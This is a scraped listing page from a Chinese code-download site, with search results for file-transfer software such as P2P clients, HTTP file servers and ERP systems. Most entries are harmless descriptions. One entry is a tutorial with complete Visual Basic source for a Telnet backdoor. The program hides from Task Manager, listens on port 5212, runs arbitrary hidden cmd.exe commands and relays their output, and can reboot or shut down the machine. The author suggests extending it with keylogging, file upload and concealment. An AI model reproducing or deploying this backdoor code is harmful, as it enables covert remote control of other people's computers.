Welcome![Sign In][Sign Up]
Location:
Search - 档案传输

Search list

[Other resourcearesregular190_01292006

Description: Galaxy Ares Galaxy是一套非常不错的免费P2P档案分享软体,虽然目前在网络上分享与下载档案最热门的方式是BT,但是BT种子并不是马上找就会有,而且若是种子太旧也下载不了;所以目前还是有不少的使用者选择P2P传输软件。不过综观市面上的P2P下载软件,不是需要付费就是功能限制太多,是否有完全免费的呢?有,Ares Galaxy就是一值得推荐的一套。它不但免费,而且支持格式很多,几乎所有的音乐、影片、图片、文件、软件等它都下载得到。除了基本的分享与搜寻下载功能之外,它还拥有以下功能特色:1. 开放原始码,若有程序设计上的缺失,很快就会被发现并立即修正。2. 没有服务器,不怕被封锁,也可自设代理服务器。3. 搜寻与下载不用透过服务器,所以速度很快。 4. 可以架设自己的聊天室或是加入别人的,成为一个社群。 5. 内建拨放器,可以预览播放,不怕下载到假档。 6. 内建媒体柜,方便整理个人收藏。 7. 内建浏览器,可以边搜寻边浏览网页。Ares Galaxy的接口简单清楚,还支持了繁体中文语系:只要在开启软件后点选「Control Panel」选项,然后将「Preferred Language」中的设定改成「chinese_tw」,就可以变成繁体中文接口了。只要使用Ares Galaxy的人越多,那么可以搜寻下载的档案就越多喔!-cf Galaxy Galaxy is a very good free P2P file-sharing software, While on the network to share and download the most popular form of BT, But BT is not immediately find seeds will be, but if the seed is too old can also download; Therefore, at present, a lot of P2P users to choose the transmission software. But on the whole the market P2P downloading software is not required to pay is a functional too restrictive, with completely free? A, cf Galaxy is a recommendable one. It not only free, but support many formats, and almost all music, film, photographs, documents, software, etc. It has been downloaded. In addition to the basic sharing and downloading the search function, it also has the following functional characteristics : 1. Open source, If the program design deficiencies will be found
Platform: | Size: 1697254 | Author: 杰克逊 | Hits:

[Communicationnetwork

Description: 网络原理课程ppt档案第一章概述.ppt第二章物理层.ppt第三章数据链路层.ppt第四章介质访问子层.ppt第五章网络层.ppt第六章传输层.ppt第七章应用层.ppt
Platform: | Size: 9082911 | Author: cuiqin | Hits:

[WEB CodeManagementSystem

Description: 全程实现无菜单操作,随手快捷流程,所见所得极易上手。特点:提供强大的生产模版、事务智能批量处理等完善的企业管理模块,操作简便快捷。完全Web化,客户端使用IE浏览器,无需安装和维护,轻松异地实现新产品开发、仓储、生产、销售、产品电子档案管理和内部通讯、视频会议、财务报表等远程无纸办公;数据远程化,数套完善的远程数据安全机制和权限分配策略,确保技术数据及商业机密在网络环境和内部传输安全可靠,切实解决阻碍本地信息化发展的不利因素,解除企业后顾之忧;变通性强,软件采用ASP码编写,图文并茂,界面优美风格别致。在提供ASP强大网络功能的同时可灵活对企业不同管理模式分别做相应的调整,使功能和界面更贴近企业实际。
Platform: | Size: 7365354 | Author: YANG WEI WEI | Hits:

[Internet-NetworkIP绑定 档案下载管理

Description: IP绑定 档案下载管理 ,内含SERVER端及CLIENT端 程序源码,详细介绍如何编写档案下载进程
Platform: | Size: 41012 | Author: asusisbad@163.comfuckdaddy | Hits:

[Network DevelopVB Telnet编程指导思路

Description:

vB编程之TELNET
对于TELNET后门的编写我们可通过VC来编写,网上也有很多的关于用VC编写TELNET后门的源码。但是看X档案的一定不少是喜欢VB来编写程序的。纵然编写TELNET后门不是VB的长项,但这不并难实现。偶没见网上有用VB编写TELNET后门的文章,所以我就写下了此文,确切的说,
这不是个真正后门,只是一个后门的基本模型,甚至可以说毛坯。BUG的修改,不足的修补,功能的扩充还需读者动手来实现。
首先,我们在大脑里想象出一个后门运行的过程或者把其大概的流程画出来,然后就按这个过程逐步来实现。好了,
下面就开始我们的后门编写之路。首先就是当程序运行时防止再一个程序的运行,实现代码如下:
Private Sub Form_Load()
syspath = systempath()
'防止多个程序运行
If App.PrevInstance Then
End
End If
cmdno = True
'使程序不在任务管理器中显示
App.TaskVisible = False
'监听端口5212
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
其次,当telnet端请求连接时,服务端接受请求。(大家可以在此试着实现密码验证机制的实现,很简单,在此不再给出代码)
当TELNET连接时,触发ConnectionRequest事件,在这个事件中向控制端发送相应的成功连接和帮助信息。
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
当我们连接上时,就需要对TELNET发来的命令进行一系列的处理和执行,以及执行相关的控制功能。
其中的问题是服务端接受来自TELNET客户端的连接和命令,由于TELNET传输命令时只能每间次传输一个字符的特殊性,
所以我们需要编写一个处理命令的过程,这个不难实现。还有就是对特殊字符的过滤和处理,如TELNET输入错误按DEL键,
按ENTER键来完成一条命令的输入。当TELNET连上服务端时,实现shell功能,以及shell功能和其它功能的分离。
对其中的问题有了大概的了解,那实现起来也就不难了。代码如下:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
'过滤del键盘,用来telnet命令输入错误处理.如果输入del键盘,则当前命令无效
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
'检察当前一个命令的完整性和对命令输入错误的处理
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
'测试时,查看接受的命令
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
'--------下面是对接受命令的处理
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
'------------------------------
'判断是不是在虚拟shell中,不是则执行如下命令,否则执行虚拟shell命令语句
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
'调用执行结果发送过程
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
接下来要考滤的是,虚拟shell的实现,我用了一个简单的方法,就是把命令执行结果写入一个文本文档,然后读取其中的内
容并将结果发送给控制端。代码如下:
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
至此,后门的主要问题都解决了,也许有的读者可以看出,这个后门模型存在问题。的确,这个后门模型并不完整,
所谓学而三思,思而后行,剩下的问题读者可以试着去解决。在此我不在给出源码。提示一下:
(1)如果TELNET不正常退出,服务端还会继续保存当前的会话,重新连接后失败。还有就是如何可以允许多人同时连接功能。
(2)读者可以加上密码验证机制,在此基础上扩大它的控制功能,如键盘记录,文件上传等。
(3)一个成功的后门,必然有一个好的隐藏和自我保护机制,所以,大家需要努力发挥自己的聪明和才智了。
以上只是个人愚见,不难实现。其实程序编写只有深入其中,动手实践,才会发现各种问题,而正是在这发现问题,解决问题的过程中,
你会学到更多,成功后的满足也更多。当我们苦苦思索解决一个问题或实现一种新方法和功能时,那种豁然开朗,
成功的喜悦会让你体会编程的乐趣。希望大家看完本文和在动手来完善它的时候,能学到些知识和技巧,那本文的目的也就达到了。

_____________--源码
Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Const EWX_SHUTDOW = 1
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt

Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub


Platform: | Size: 8205 | Author: onetwogoo | Hits:

[ASP温州天邦简易ERP企业管理系统

Description:  温州天邦简易ERP企业管理系统(简称TBERP)是温州柳市电器行业信息化ASP平台开发与应用项目,2005年1月成功入选『国家863计划』于2007年3月顺利通过国家科委专家评审,属乐清科技局科技创新专项资助重点推广项目。系统由清华大学的清软英泰公司、国家自动化研究所协助编写,是一套集企业资源计划(ERP)、产品数据管理(PDM)有机结合的多功能电器企业生产管理软件。系统切合本地企业模式遵循功能浓缩操作轻便设计理念,超常规敢于人先的人性化高效快捷操作设计更贴合温州企业模式。应用超强的智能数据处理模块,在确保提供常规强劲的ERP和PDM功能的同时使操作步骤简化到极限。   全程实现无菜单操作,随手快捷流程,所见所得极易上手,是一套具有供销存管理,PDM产品数据管理,oa办公系统与一体的基于web的生产加工、日用百货、化妆品、服装鞋帽、家具制造、五金机械、汽配摩配、计算机、建材装饰、化工制药、医疗器械、通讯器材、钟表仪器、塑胶制品、机电、电工照明、电子电器业ERP管理软件。 特点:提供强大的生产模版、事务智能批量处理等完善的企业管理模块,操作简便快捷。完全Web化,客户端使用IE浏览器,无需安装和维护,轻松异地实现新产品开发、仓库管理、生产管理、销售管理、电子邮件、企业邮件管理与监控、产品电子档案管理、图纸管理和内部通讯、视频会议、财务报表等远程无纸办公;数据远程化,数套完善的远程数据安全机制和权限分配策略,确保技术数据及商业机密在网络环境和内部传输安全可靠,切实解决阻碍本地信息化发展的不利因素,解除企业后顾之忧;变通性强,软件采用ASP码编写,图文并茂,界面优美风格别致。在提供ASP强大网络功能的同时可灵活对企业不同管理模式分别做相应的调整,使功能和界面更贴近企业实际。
Platform: | Size: 4944735 | Author: 24188124@qq.com | Hits:

[P2Paresregular190_01292006

Description: Galaxy Ares Galaxy是一套非常不错的免费P2P档案分享软体,虽然目前在网络上分享与下载档案最热门的方式是BT,但是BT种子并不是马上找就会有,而且若是种子太旧也下载不了;所以目前还是有不少的使用者选择P2P传输软件。不过综观市面上的P2P下载软件,不是需要付费就是功能限制太多,是否有完全免费的呢?有,Ares Galaxy就是一值得推荐的一套。它不但免费,而且支持格式很多,几乎所有的音乐、影片、图片、文件、软件等它都下载得到。除了基本的分享与搜寻下载功能之外,它还拥有以下功能特色:1. 开放原始码,若有程序设计上的缺失,很快就会被发现并立即修正。2. 没有服务器,不怕被封锁,也可自设代理服务器。3. 搜寻与下载不用透过服务器,所以速度很快。 4. 可以架设自己的聊天室或是加入别人的,成为一个社群。 5. 内建拨放器,可以预览播放,不怕下载到假档。 6. 内建媒体柜,方便整理个人收藏。 7. 内建浏览器,可以边搜寻边浏览网页。Ares Galaxy的接口简单清楚,还支持了繁体中文语系:只要在开启软件后点选「Control Panel」选项,然后将「Preferred Language」中的设定改成「chinese_tw」,就可以变成繁体中文接口了。只要使用Ares Galaxy的人越多,那么可以搜寻下载的档案就越多喔!-cf Galaxy Galaxy is a very good free P2P file-sharing software, While on the network to share and download the most popular form of BT, But BT is not immediately find seeds will be, but if the seed is too old can also download; Therefore, at present, a lot of P2P users to choose the transmission software. But on the whole the market P2P downloading software is not required to pay is a functional too restrictive, with completely free? A, cf Galaxy is a recommendable one. It not only free, but support many formats, and almost all music, film, photographs, documents, software, etc. It has been downloaded. In addition to the basic sharing and downloading the search function, it also has the following functional characteristics : 1. Open source, If the program design deficiencies will be found
Platform: | Size: 1696768 | Author: 杰克逊 | Hits:

[Program docnetwork

Description: 网络原理课程ppt档案第一章概述.ppt第二章物理层.ppt第三章数据链路层.ppt第四章介质访问子层.ppt第五章网络层.ppt第六章传输层.ppt第七章应用层.ppt-Network ppt file Chapter I sets out the principle of course. Ppt chapter physical layer. Ppt Chapter III data link layer. Ppt Chapter IV Medium Access Sublayer. Ppt Chapter V network layer. Ppt Chapter VI transport layer. Ppt VII Chapter application layer. ppt
Platform: | Size: 9082880 | Author: cuiqin | Hits:

[WEB CodeManagementSystem

Description: 全程实现无菜单操作,随手快捷流程,所见所得极易上手。特点:提供强大的生产模版、事务智能批量处理等完善的企业管理模块,操作简便快捷。完全Web化,客户端使用IE浏览器,无需安装和维护,轻松异地实现新产品开发、仓储、生产、销售、产品电子档案管理和内部通讯、视频会议、财务报表等远程无纸办公;数据远程化,数套完善的远程数据安全机制和权限分配策略,确保技术数据及商业机密在网络环境和内部传输安全可靠,切实解决阻碍本地信息化发展的不利因素,解除企业后顾之忧;变通性强,软件采用ASP码编写,图文并茂,界面优美风格别致。在提供ASP强大网络功能的同时可灵活对企业不同管理模式分别做相应的调整,使功能和界面更贴近企业实际。
Platform: | Size: 7364608 | Author: YANG WEI WEI | Hits:

[Ftp Clienthfs2

Description: 专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者,直接将欲加入的档案拖曳至此窗口,便可架设完成个人 HTTP 虚拟档案服务器. Http File Server 汉化绿色免费版的使用说明: 请把软件解压到英文目录下运行,此版本在中文目录下不能运行。-Specifically for individual users designed HTTP file system- Http File Server, if you think too much of a hassle to set up FTP Server, then this software can provide you with a more convenient file transfer system, there is no need to install after downloading, as long as the extract after the implementation of hfs.exe , in Virtual File System (virtual file system) under the pane by right mouse button, you can Add/Remove a virtual file folder, or directly drag files to join this window can be set up to complete personal HTTP virtual file server. Http File Server Chinese green version of the use of free Description: Please unzip the software to run under the English directory, this directory in the Chinese version can not run.
Platform: | Size: 754688 | Author: 朱晓东 | Hits:

[Other961

Description: 台湾逢甲大学的2007年的毕业设计论文,点对点档案传输系统等-paper of FENGJIA University TAIWAN CHINA
Platform: | Size: 10127360 | Author: aircraft | Hits:

[File FormatBitTorrent-4.0.1

Description: BitTorrent(简称BT,俗称BT下载、变态下载)是一个多点下载的源码公开的P2P软件,使用非常方便, 就像一个浏览器插件,很适合新发布的热门下载。其特点简单的说就是:下载的人越多,速度越快。 BT下载工具软件可以说是一个最新概念P2P的下载工具、它采用了多点对多点的原理,一般简称 BT(BitTorrent) 也就是大家所说的变态下载。该软件相当的特殊,一般我们下载档案或软件,大都由 HTTP 站点或FTP 站台下载,若同时间下载人数多时,基于该服务器频宽的因素,速度会减慢许多,而该软件却不同,恰巧相反,同时间下载的人数越多你下载的速度便越快,因为它采用了多点对多点的传输原理。 -BitTorrent is the global standard for delivering high-quality files over the Internet. With an installed base of over 160 million clients worldwide, BitTorrent technology has turned conventional distribution economics on its head. The more popular a large video, audio or software file, the faster and cheaper it can be transferred with BitTorrent. The result is a better digital entertainment experience for everyone
Platform: | Size: 181248 | Author: tom | Hits:

[CSharpWindowsFormsApplication2

Description: C#透过TCP通讯协定传输档案。Server端应用程式。-C# transfer files via TCP protocol. Server-side applications.
Platform: | Size: 58368 | Author: deno.tw | Hits:

[Remote Controlhttpfileserver

Description: 架设个人的 HTTP 文件服务器,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装。运行主程序,在“虚拟文件系统”窗格下按鼠标右键,即可新增/移除文件夹。或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人 HTTP 文件服务器。主程序提供卸载功能-Set up the individual HTTP file server, set up FTP Server if you feel too much trouble, then this software can provide you with a more convenient file transfer system to download without installing it. Run the main program, in the " virtual file system" under the pane, click the right mouse button, you can add/remove folder. Or want to join directly to this window, drag the file can be set up with personal HTTP file server. The main program to provide uninstall functionality
Platform: | Size: 849920 | Author: DIVE | Hits:

[Special Effectsimage-mosaic

Description: 图像拼接技术可广泛应用于诸多领域,在宇宙空间探测、海底勘测、医学、气象、地质勘测、军事、视频压缩和传输、档案的数字化保存、视频的索引和检索、物体的三维重建、数码相机的超分辨率处理等领域都有广泛应用。 -Image stitching technology can be widely used in many fields, detection in space, seabed survey, medical, meteorological, geological surveying, military, video compression and transmission of files for digital preservation, video indexing and retrieval of three-dimensional reconstruction of the object, a digital camerathe super-resolution processing has a wide range of applications
Platform: | Size: 8711168 | Author: Jason | Hits:

[matlabMIMO-OFDM-Simulator

Description:  多输入多输出正交分频多工模拟器。    正交分频多工:OFDM模拟器(外层函数)         create_channel:产生一个瑞利衰落信道复用,解的天线配置、正交分频多工结构、power-delay档案。         svd_decompose_channel:既然全网络知识是假设,在并行传输奇异值模式。这个函数分解这些频道模式。         BitLoad:适用bit-loading算法来实现预期的钻头和能量 -MIMO OFDM Simulator: OFDM.m: OFDM Simulator (outer function) create_channel.m: Generates a Rayleigh fading frequency-selective channel, parametrized by the antenna configuration, the OFDM configuration, and the power-delay profile. svd_decompose_channel.m: Since full channel knowledge is assumed, transmission is across parallel singular value modes. This function decomposes the channel into these modes. BitLoad.m: Apply the bit-loading algorithm to achieve the desired bit and energy allocation for the current channel instance. ComputeSNR.m: Given the subcarrier gains, this simple function generates the SNR values of each channel (each singular value on each tone is a separate channel). chow_algo.m: Apply Chow s algorithm to generate a particular bit and energy allocation. EnergyTableInit.m: Given the SNR values, form a table of energy increments for each channel. campello_algo.m: Apply Campello s algorithm to converge to the optimal bit and energy allocatio
Platform: | Size: 14336 | Author: liufan | Hits:

[Otherhealth_net

Description: 职工健康档案管理是一套B/S架构的网络版系统。后台管理和前台个人查询都通过浏览器进入访问。该系统主要完成职工健康状况的记录、历次体检结果的存储、查询、统计分析、EXCEL数据导出等功能。系统提供了模板导入功能,方便对每次员工集中体检后大量体检数据的批量录入。为避免个人隐私信息的泄漏,系统对数据库数据及传输过程进行加密保护。系统具有灵活的统计功能和数据导出功能,满足企业医务管理的需求-Employee health records management is a set of B/S structure of the network version of the system. Manage and front desk personal query through the browser into the visit. The system is mainly to complete the record of the workers' health status, previous examination results storage, query, statistical analysis, Excel data export and other functions. The system provides a template import feature, convenient batch entry for each employee centralized examination after a large number of medical data. To avoid the leakage of personal privacy information, the system database data transmission encryption. The system has a flexible statistical functions and data export functions, to meet the needs of corporate medical management
Platform: | Size: 7431168 | Author: 金山 | Hits:

[Linux driverLinux_tar_usages

Description: tar可以为文件和目录创建档案。利用tar,用户可以为某一特定文件创建档案(备份文件),也可以在档案中改变文件,或者向档案中加入新的文件。 tar最初被用来在磁带上创建档案,现在,用户可以在任何设备上创建档案,如软盘。利用tar命令,可以把一大堆的文件和目录全部打包成一个文件,这对于备份文件或将几个文件组合成为一个文件以便于网络传输是非常有用的。Linux上的tar是GNU版本的。 -tar files and directories can be created files. The use of tar, the user can create a file for a particular file (backup file), you can also change the file in the file, or the file is added to the new file. tar was originally used to create the file on tape now, the user can create a file on any device, such as a floppy disk. Use the tar command, you can put a bunch of files and directories, all packaged into a single file, which for the backup file or several files combined into one file for the network transmission is very useful. On Linux is the GNU version of tar.
Platform: | Size: 1024 | Author: peter | Hits:

[OtherHttp File Server 2.3k Build 299

Description: hfs网络文件服务器是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。(HFS HTTP is a network file server file system designed for individual users, if you feel too much trouble to set up FTP Server, then this software can provide you with a more convenient network file transfer system, do not install after downloading, as long as the decompression after the implementation of hfs.exe, in the "Virtual File System" (virtual file system) under pane the right mouse button, you can add / remove virtual file folder, or directly to join the files by dragging this window, can be set up to complete personal HTTP network file server.)
Platform: | Size: 870400 | Author: 神坑队长 | Hits:

CodeBus www.codebus.net